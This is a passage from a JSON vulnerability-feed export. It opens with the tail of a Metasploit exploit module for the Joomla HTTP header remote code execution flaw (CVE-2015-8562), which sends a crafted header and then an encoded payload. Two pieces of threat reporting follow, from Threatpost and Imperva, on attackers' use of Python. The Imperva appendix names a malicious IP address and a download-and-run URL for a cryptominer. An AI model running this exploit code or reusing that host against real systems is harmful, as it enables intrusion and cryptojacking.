\nsuper(\"#{peer} - #{msg}\") \nend \n \ndef exploit \nif check == Exploit::CheckCode::Safe && datastore['FORCE'] == false \nprint_error('Target seems safe, so we will not continue.') \nreturn \nend \n \nprint_status(\"Sending payload ...\") \nheader_name = Rex::Text.rand_text_alpha_upper(5) \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => 
target_uri.path, \n'headers' => { datastore['HEADER'] => get_payload(header_name) } \n}) \nfail_with(Failure::Unknown, 'No response') if res.nil? \nsession_cookie = res.get_cookies \nsend_request_cgi({ \n'method' => 'GET', \n'uri' => target_uri.path, \n'cookie' => session_cookie, \n'headers' => { \nheader_name => Rex::Text.encode_base64(payload.encoded) \n} \n}) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/134949/joomla_http_header_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "threatpost": [{"lastseen": "2019-05-30T05:51:00", "bulletinFamily": "info", "description": "Python was recently touted as on track to become the world\u2019s most prevalent coding language, looking to swallow, as it were, the majority of the market share for developers. According to recent analysis, Python\u2019s popularity also extends to black hats.\n\nMirroring [the findings](<https://www.economist.com/graphic-detail/2018/07/26/python-is-becoming-the-worlds-most-popular-coding-language>) around its use by coders overall, Python-based tools were used in up to 77 percent of attacks against sites seen in telemetry from Imperva, between the end of June and mid-September. 
The data also shows that in over a third of the cases, a Python-based tool was responsible for the majority of daily attacks.\n\n\u201cThese levels, over time, show that Python-based tools are used for both breadth and depth scanning,\u201d Imperva said in its [report](<https://www.imperva.com/blog/2018/09/the-worlds-most-popular-coding-language-happens-to-be-most-hackers-weapon-of-choice/>), released Thursday.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/09/27152230/Python-daily-percentage.png>)\n\nMeanwhile, a survey of GitHub by the firm roughly estimated that more than 20 percent of GitHub repositories containing an attack tool or an exploit proof of concept (PoC) are written in Python.\n\n\u201cIn virtually every security-related topic in GitHub, the majority of the repositories are written in Python, including tools such as [w3af](<https://github.com/andresriancho/w3af>), [Sqlmap](<https://github.com/sqlmapproject/sqlmap>) and even the infamous [AutoSploit](<https://arstechnica.com/information-technology/2018/02/threat-or-menace-autosploit-tool-sparks-fears-of-empowered-script-kiddies/>) tool,\u201d Imperva noted.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/09/27152129/Python-clients.png>)\n\nSecurity incidents by client.\n\nIn a look at web clients, Imperva researchers reviewed their data, specifically security incidents, and found that more than 25 percent of the clients seen \u2014 excluding vulnerability scanners \u2014 were Python-based tools used by malicious actors, making it the most common vector for launching exploit attempts.\n\nThe two most popular Python modules used for web attacks are Urllib and Python Requests, the research found. 
Use of a new module, Async IO, is just kicking off.\n\nIn addition, Python is used to target specific applications and frameworks like [Struts](<https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/>) and [WordPress](<https://threatpost.com/severe-php-exploit-threatens-wordpress-sites-with-remote-code-execution/136649/>).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/09/27152016/Python-exploits.png>)\n\nFrameworks targeted by Python.\n\n\u201cThe advantages of Python as a coding language make it a popular tool for implementing known exploits,\u201d Imperva said. It noted the prevalence especially of exploits for the [CVE-2017-9841](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9841>) PHP-based remote code-execution (RCE) vulnerability in the PHPUnit framework, and [CVE-2015-8562](<https://nvd.nist.gov/vuln/detail/CVE-2015-8562>) RCE flaw in the Joomla! framework.\n\n\u201cSince Python is so widely used by hackers, there is a host of different attack vectors to take into consideration,\u201d Imperva noted. \u201cPython requires minimal coding skills, making it easy to write a script and exploit a vulnerability.\u201d\n", "modified": "2018-09-27T20:08:07", "published": "2018-09-27T20:08:07", "id": "THREATPOST:9475C86517671FDF8D35E7E89FB91463", "href": "https://threatpost.com/threatlist-hackers-turn-to-python-as-attack-coding-language-of-choice/137757/", "type": "threatpost", "title": "Threatlist: Hackers Turn to Python as Attack Coding Language of Choice", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2018-11-25T17:36:07", "bulletinFamily": "blog", "description": "\n\nPython will soon be the world\u2019s most prevalent coding language. 
\n\nThat\u2019s quite a statement, but if you look at its simplicity, flexibility and the relative ease with which folks pick it up, it\u2019s not hard to see why [The Economist](<https://www.economist.com/graphic-detail/2018/07/26/python-is-becoming-the-worlds-most-popular-coding-language>) recently touted it as the soon-to-be most used language, globally. Naturally, our threat research team had to poke around and see how popular Python is among bad actors. \n\nAnd the best place to do that, well, [Github](<https://github.com/>), of course. Roughly estimating, more than 20% of GitHub repositories that implement an attack tool / exploit PoC are written in Python. In virtually every security-related topic in GitHub, the majority of the repositories are written in Python, including tools such as [w3af](<https://github.com/andresriancho/w3af>) , [Sqlmap](<https://github.com/sqlmapproject/sqlmap>), and even the infamous [AutoSploit](<https://www.imperva.com/>) tool.\n\nAt [Imperva](<https://www.imperva.com/>), we use an advanced intelligent [Client Classification](<https://www.incapsula.com/blog/how-incapsula-client-classification-challenges-bots.html>) mechanism that distinguishes and classifies various web clients. When we take a look at our data, specifically security incidents, the majority of the clients (>25%) we identify -- excluding vulnerability scanners -- are based on [Python](<https://github.com/topics/security?l=python>). \n\nUnlike other clients, in Python, we see a host of different attack vectors and the usage of known exploits. Hackers, like developers, enjoy Python\u2019s advantages which makes it a popular hacking tool.\n\n Figure 1: Security incidents by client, excluding vulnerability scanners. 
More than 25% of the clients were Python-based tools used by malicious actors, making it the most common vector for launching exploit attempts.\n\n**When examining the use of Python** in attacks against sites we protect, the result was unsurprising - a large chunk, up to 77%, of the sites were attacked by a Python-based tool, and in over a third of the cases a Python-based tool was responsible for the majority of daily attacks. These levels, over time, show that Python-based tools are used for both breadth and depth scanning. \n\n Figure 2: Daily percentage of sites suffering Python-based attacks\n\n## **Python Modules**\n\nThe two most popular Python modules used for web attacks are Urllib and Python Requests. The chart below shows attack distribution. Use of the new module, Async IO, is just kicking off, which makes perfect sense when you consider the vast possibilities the library offers in the field of [layer 7 DDoS](<https://www.imperva.com/app-security/threatglossary/ddos-attacks/>); especially when using a \u201cSpray N\u2019 Pray\u201d technique: \n\n\n## **Python and Known Exploits**\n\nThe advantages of Python as a coding language make it a popular tool for implementing known exploits. We collected information on the top 10 vulnerabilities recently used by a Python-based tool, and we don\u2019t expect it to stop.\n\nThe two most popular attacks in the last 2 months used CVE-2017-9841 - a PHP based Remote Code Execution (RCE) vulnerability in the PHPUnit framework, and CVE-2015-8562 which is a RCE against the Joomla! Framework. It isn\u2019t surprising that the most common attacks had RCE potential, considering how valuable it is to malicious actors.\n\nAnother example, which isn't in the top 10, is CVE-2018-1000207, which had hundreds of attacks each day for several days during the last week of August 2018. 
Deeper analysis shows that the attack was carried out on multiple protected customers, by a group of IPs from China.\n\n## **CVEs over time**\n\n \nYou can see that the number of CVEs which are being used by attackers, according to our data, has increased in the last few years: \n \nIn addition, Python is used to target specific applications and frameworks - below you can find the top 10, according to our data: \n \nWhen we looked at all the frameworks targeted by Python, the attacks that stand out are those aimed at Struts, WordPress, Joomla and Drupal, which is not surprising as these are currently [some of the most popular frameworks](<https://websitesetup.org/popular-cms/>) out there.\n\n## **Attack vectors**\n\nThe most popular HTTP parameter value we\u2019ve seen used in attacks, responsible for around 30% of all different param values used, belongs to a backdoor upload attempt through a PHP Unserialize vulnerability in Joomla! using the JDatabaseDriverMysqli object. The backdoor uploaded payload is hosted on [ICG-AuthExploiterBot](<https://github.com/04x/ICG-AutoExploiterBoT>).\n\nWe\u2019ve also seen a recurring payload that turned out to be a Coinbitminer infection attempt, more details on that are in the appendix -- note, the appendix is only meant as an example. Since Python is so widely used by hackers, there is a host of different attack vectors to take into consideration. 
Python requires minimal coding skills, making it easy to write a script and exploit a vulnerability.\n\n### **Our recommendation**\n\nUnless you can differentiate between requests from Python-based tools and any other tool, our recommendations stay the same - make sure to keep security in mind when developing, keep your system up to date with patches, and refrain from any practice that is considered insecure.\n\n## Appendix - Example of an Attack \n\n### Here\u2019s an interesting, recurring payload we\u2019ve observed (with a small variance at the end):\n\n \nAfter base64 decoding it, we get a binary payload: \n \nIn the above payload, there is a mention of a GitHub repository for a deserialization exploitation tool and a wget command download in a jpg file, which strongly suggests there is malicious activity. After downloading the file from http://45.227.252.250/jre.jpg we can see that it\u2019s actually a script containing the following: \n \nThe two last lines in the script try to get http://45.227.252.250/static/font.jpg%7Csh, which is identified as Trojan. Coinbitminer by Symantec Endpoint Protection. \n \nThis finding relates to [a tweet from the end of August](<https://twitter.com/ryancbarnett/status/1033110659259662338>) 2018, talking about a new Apache Struts vulnerability CVE-2018-11776 used to infect with the same Coinbitminer. 
\n**While you're here, also read: [Imperva Python SDK \u2013 We\u2019re All Consenting SecOps Here](<https://www.imperva.com/blog/2018/05/imperva-python-sdk-were-all-consenting-secops-here/>)**\n\nThe post [The World's Most Popular Coding Language Happens to be Most Hackers' Weapon of Choice](<https://www.imperva.com/blog/the-worlds-most-popular-coding-language-happens-to-be-most-hackers-weapon-of-choice/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "modified": "2018-09-26T16:18:36", "published": "2018-09-26T16:18:36", "id": "IMPERVABLOG:F2DBFC086ED3B70700CD22E02FB39FC8", "href": "https://www.imperva.com/blog/the-worlds-most-popular-coding-language-happens-to-be-most-hackers-weapon-of-choice/", "type": "impervablog", "title": "The World\u2019s Most Popular Coding Language Happens to be Most Hackers\u2019 Weapon of Choice", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}